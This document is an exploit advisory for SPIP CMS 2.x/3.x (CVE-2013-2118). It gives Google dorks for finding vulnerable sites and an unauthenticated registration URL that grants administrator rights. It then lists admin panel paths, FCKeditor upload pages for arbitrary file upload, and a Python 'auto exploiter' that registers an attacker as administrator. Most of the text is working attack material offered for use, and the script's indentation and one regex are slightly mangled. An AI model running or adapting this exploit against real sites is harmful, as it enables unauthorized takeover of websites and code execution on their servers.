############################################################################################

# Exploit Title : Spip CMS 2.x/3.x Add Administrator Account & Arbitrary File Upload
# ############################################################################################

# Exploit Title : Spip CMS 2.x/3.x Add Administrator Account & Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Published Date : 26/03/2019
# First Discovered Date : 2013 - 2014
# Vendor Homepage : spip.net
# Software Download Links : files.spip.org/spip/archives/
files.spip.net/spip/archives/SPIP-v2-1.16.zip
files.spip.net/spip/archives/SPIP-v2-0-9.zip
files.spip.net/spip/archives/SPIP-v2-1.22.zip
files.spip.net/spip/archives/SPIP-v2-0-23.zip
files.spip.net/spip/archives/SPIP-v3.0.9.zip
# Software Information Link : spip.net/rubrique25.html
# Software Affected Versions :
Spip 2.x - 3.x - 3.0.9 / 2.0.0 - 2.0.10 -
2.0.20 - 2.1.5 - 2.1.22 / 2.0.23 - 2.1.15
3.0.0 - 3.0.1 - 3.0.x - All Spip CMS 2.x - 3.x Version
# Solution : Update/Upgrade to Higher Version to 3.1.0 and higher
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks :
inurl:/spip.php?rubrique site:fr
inurl:/spip.php?article site:fr
# CVE : cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2118
cvedetails.com/cve/CVE-2013-2118/
# Vulnerability Type : CWE-286 [ Incorrect User Management ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm.Org Reference Link :
cyberizm.org/cyberizm-spip-cms-2-0-admin-panele-erisim-acigi.html

############################################################################################

# Description about Software :
***************************
SPIP is a free software content management system. SPIP is a publishing system for the Internet in which great importance is a

ttached to collaborative working, to multilingual environments, and to simplicity of use for web authors.

It is free software, distributed under the GNU/GPL licence. This means that it can be used for any Internet site, whether personal

or institutional, non-profit or commercial. SPIP is developed (programmed, documented, translated, etc.) and used by a community

in which there is an open invitation to participate.

############################################################################################

# According to the CVE-2013-2118 :
********************************
SPIP 3.0.x before 3.0.9, 2.1.x before 2.1.22, and 2.0.x before 2.0.23 allows remote

attackers to gain privileges and "take editorial control" via vectors related to ecrire/inc/filtres.php.

############################################################################################

# Impact :
***********
The software SPIP 2.x/3.x does not properly manage a user within its environment.

This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.

To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.

Users can be assigned to the wrong group class of permissions resulting in unintended access rights to sensitive objects.

Spip 2.x/3.x is prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary

files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

############################################################################################

# Vulnerable File Source Code : [ filtres.php ]
***************************************
File => /ecrire/inc/filtres.php

core.spip.net/projects/spip/repository/revisions/20541/entry/branches/spip-2.1/ecrire/inc/filtres.php

# Vulnerability :
**************
Add New Administrator/Author Account

/spip.php?page=identifiants&mode=0minirezo

It says : "Vous inscrire sur ce site " means " Register to this Site.

After Registration - it says :

Votre nouvel identifiant vient de vous être envoyé par email.

Your new login details has just been sent to you by email.

Register yourself - Give a Random Nickname and Your Real E-Mail Address.

The System will send you automatically a password for Admin/Author Login.

There is Auto Exploiter down. You can use this.

# Admin Panel Login Path :
************************
/ecrire

/spip.php?page=login&url=%2Fecrire%2F

/?page=login&lang=fr

# Useable Admin Control Panel URL Links :
***************************************
/ecrire/?exec=accueil

/ecrire/?bonjour=oui

/ecrire/?exec=rubrique_edit&new=oui

/ecrire/?exec=rubriques_edit&new=oui

/IMG/html/....

/IMG/txt/...

/IMG/jpg/...

/IMG/gif/..

/IMG/png/...

/ecrire/?exec=recherche

/ecrire/?exec=articles

/ecrire/?exec=article_edit&new=oui

/ecrire/?exec=articles_edit&new=oui

/ecrire/?exec=article&id_article=[ID-NUMBER]

/ecrire/?exec=articles&id_article=[ID-NUMBER]

/ecrire/?exec=articles_edit&id_article=[ID-NUMBER]

/ecrire/?exec=naviguer&id_rubrique=[ID-NUMBER]

/ecrire/?exec=rubriques_edit&id_rubrique=[ID-NUMBER]&retour=nav

/ecrire/?exec=rubriques_edit&new=oui&id_parent=[ID-NUMBER]

/ecrire/?exec=mot_edit&new=oui

/ecrire/?exec=site_edit&new=oui

/ecrire/?exec=breve_edit&new=oui

/ecrire/?exec=breve_edit&new=oui&id_rubrique=[ID-NUMBER]

/ecrire/?exec=auteurs

/ecrire/?exec=auteur_edit&new=oui

/ecrire/?exec=auteurs&statut=0minirezo

/ecrire/?exec=auteur_edit&id_auteur=[AUTHOR-ID-NUMBER]

/ecrire/?exec=auteurs&statut=1comite

/ecrire/?exec=auteur&id_auteur=[ID-NUMBER]

/ecrire/?exec=message_edit&new=oui&to=[ID-NUMBER]&redirect=.%2F%3Fexec%3Dauteur%26amp%3Bid_auteur%3D[ID-NUMBER]

/ecrire/?exec=auteurs&statut=!0minirezo,1comite,5poubelle

/ecrire/?exec=statistiques_referers

/ecrire/?exec=rubriques

/ecrire/?exec=rubrique&id_rubrique=[ID-NUMBER]

/ecrire/?exec=rubrique_edit&id_rubrique=[ID-NUMBER]

/ecrire/?exec=article_edit&id_article=[ID-NUMBER]

/ecrire/?exec=brouteur

/ecrire/?exec=clevermail

/ecrire/?exec=clevermail_lists

/ecrire/?exec=clevermail_list_edit&lst_id=-1

/ecrire/?exec=clevermail_subscribers

/ecrire/?exec=clevermail_subscriber_new

/ecrire/?exec=clevermail_settings_edit

/ecrire/?exec=forum

/ecrire/?exec=forum&repondre=[ID-NUMBER]

/ecrire/?exec=calendrier

/ecrire/?exec=messages

/ecrire/?exec=message&id_message=[ID-NUMBER]

/ecrire/?exec=message_edit&id_message=[ID-NUMBER]

/ecrire/?exec=documents

/ecrire/?exec=document_edit&id_document=[ID-NUMBER]

/ecrire/?exec=documents&statut=publie

/ecrire/?exec=documents&statut=publie&media=image

/ecrire/?exec=documents&statut=publie&media=audio

/ecrire/?exec=documents&statut=publie&media=video

/ecrire/?exec=documents&statut=publie&media=file

/ecrire/?exec=documents&media=file&statut=publie

/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle

/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=oui

/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non

/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non&orphelins=1

/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non&brise=1

/ecrire/?exec=documents&statut=publie&media=file&extension=html&ajouter=oui

/ecrire/?exec=mots

/ecrire/?exec=groupe_mots_edit&id_groupe=[ID-NUMBER]

/ecrire/?exec=mot_edit&new=oui&id_groupe=[ID-NUMBER]&redirect=.%2F%3Fexec%3Dmots

/ecrire/?exec=sites

/ecrire/?exec=site&id_syndic=[ID-NUMBER]

/ecrire/?exec=site_edit&id_syndic=[ID-NUMBER]

/ecrire/?exec=breves

/ecrire/?exec=breve&id_breve=[ID-NUMBER]

/ecrire/?exec=breve_edit&id_breve=[ID-NUMBER]

/ecrire/?exec=message&id_message=[ID-NUMBER]

/ecrire/?exec=message_edit&id_message=[ID-NUMBER]

/ecrire/?exec=revision&id_objet=[ID-NUMBER]&objet=article&id_version=[ID-NUMBER]

/ecrire/?exec=article_edit&id_article=[ID-NUMBER]

/ecrire/?exec=infos_perso

/spip.php?auteur[ID-NUMBER]&var_mode=preview

/ecrire/?exec=visiteurs

/ecrire/?exec=suivi_edito

/ecrire/?exec=article&id_article=[ID-NUMBER]

/ecrire/?exec=article_edit&id_article=[ID-NUMBER]

/ecrire/?exec=synchro

/ecrire/?exec=revisions

/ecrire/?exec=revision&id_objet=[ID-NUMBER]&objet=article&id_version=[ID-NUMBER]

/ecrire/?exec=article_edit&id_article=[ID-NUMBER]

/ecrire/?exec=controler_forum

/ecrire/?exec=controler_forum&type_message=interne

/ecrire/?exec=controler_forum&type_message=vide

/ecrire/?exec=stats_visites

/ecrire/?exec=stats_referers

/ecrire/?exec=stats_repartition

/ecrire/?exec=stats_lang

/ecrire/?exec=navigation&menu=menu_squelette

/ecrire/?exec=configurer_mediabox

/ecrire/?exec=zengarden

/ecrire/?exec=configurer_sarkaspip&cfg=accueil

/ecrire/?exec=admin_vider

/ecrire/?exec=sauvegarder

/ecrire/?exec=restaurer

/ecrire/?exec=admin_tech

/ecrire/?exec=job_queue

/ecrire/?exec=configurer_identite

/local/cache-vignettes/.......

/IMG/png/....

/IMG/gif/.....

/IMG/jpg/....

/ecrire/?exec=configurer_langue

/ecrire/?exec=config_lang

/ecrire/?exec=admin_tech

/ecrire/?exec=admin_vider

/ecrire/?exec=admin_plugin

/ecrire/?exec=cfg

/ecrire/?exec=configurer_multilang

/ecrire/?exec=configurer_contenu

/ecrire/?exec=configurer_interactions

/ecrire/?exec=configurer_avancees

/ecrire/?exec=admin_plugin

/ecrire/?exec=admin_plugin&voir=tous

/ecrire/?exec=admin_plugin&voir=actif

/ecrire/?exec=admin_plugin&voir=inactif

/ecrire/?exec=admin_plugin&voir=inactif&verrouille=tous

/ecrire/?exec=admin_plugin&voir=inactif&verrouille=non

/ecrire/?exec=configurer_forum

/ecrire/?exec=configurer_revisions

/ecrire/?exec=configurer_urls

/ecrire/?exec=charger_plugin

/ecrire/?exec=rubriques

/ecrire/?exec=articles

/ecrire/?exec=documents

/ecrire/?exec=navigation&menu=menu_edition

/ecrire/?exec=navigation&menu=menu_administration

/ecrire/?exec=navigation&menu=menu_configuration

/ecrire/?exec=configuration

/ecrire/?exec=config_identite

/ecrire/?exec=recherche&recherche=

/spip.php?page=distrib

/spip.php?article[ID-NUMBER]&lang=fr

/ecrire/?exec=aide_index&var_lang=en

# Arbitrary File Upload / Insert File Exploit :
****************************************
/plugins/fckeditor-spip-2/fckeditor/editor/filemanager/connectors/uploadtest.html
/plugins/auto/fckeditor-spip-2/fckeditor/editor/filemanager/connectors/uploadtest.html
/plugins/fckeditor-spip-2-4/fckeditor/editor/filemanager/connectors/uploadtest.html

/userfiles/....
/UserFiles/...

/ecrire/?exec=article_edit&new=oui
/ecrire/?exec=articles_edit&new=oui

/IMG/html/[YOURFILENAME].html .jpg gif .png .txt

/local/cache-vignettes/.......

/IMG/png/....

/IMG/gif/.....

/IMG/jpg/....

# Python Auto Exploiter :
***********************
import urllib, urllib2
import cookielib
import sys
import re

def send_request(urlOpener, url, post_data=None):
request = urllib2.Request(url)
url = urlOpener.open(request, post_data)
return url.read()

if len(sys.argv) < 4:
print "SPIP < 3.x - 2.x - 3.0.9 / 2.1.22 / 2.0.23 exploit by KingSkrupellos Cyberizm Digital Security Team Usage: python script.py <SPIP base_url> <login> <mail>"
exit()

base_url = sys.argv[1]
login = sys.argv[2]
mail = sys.argv[3]

cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))


formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."


m = re.search("<input name='formulaire_action_args' type='hidden' [^>]*", formulaire)
m = re.search("(?<=value=')[w+/=]*",m.group(0));


formulaire_data = {'var_ajax' : 'form',
'page' : 'identifiants',
'mode' : '0minirezo',
'formulaire_action' : 'inscription',
'formulaire_action_args' : m.group(0),
'nom_inscription' : login,
'mail_inscription' : mail,
'nobot' : ''
}
formulaire_data = urllib.urlencode(formulaire_data)


send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"


print "[+] You should receive an email with credentials soon :) "

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################